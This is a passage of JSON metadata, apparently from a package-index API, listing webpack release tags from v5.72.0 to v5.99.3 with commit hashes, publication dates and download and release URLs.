"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.co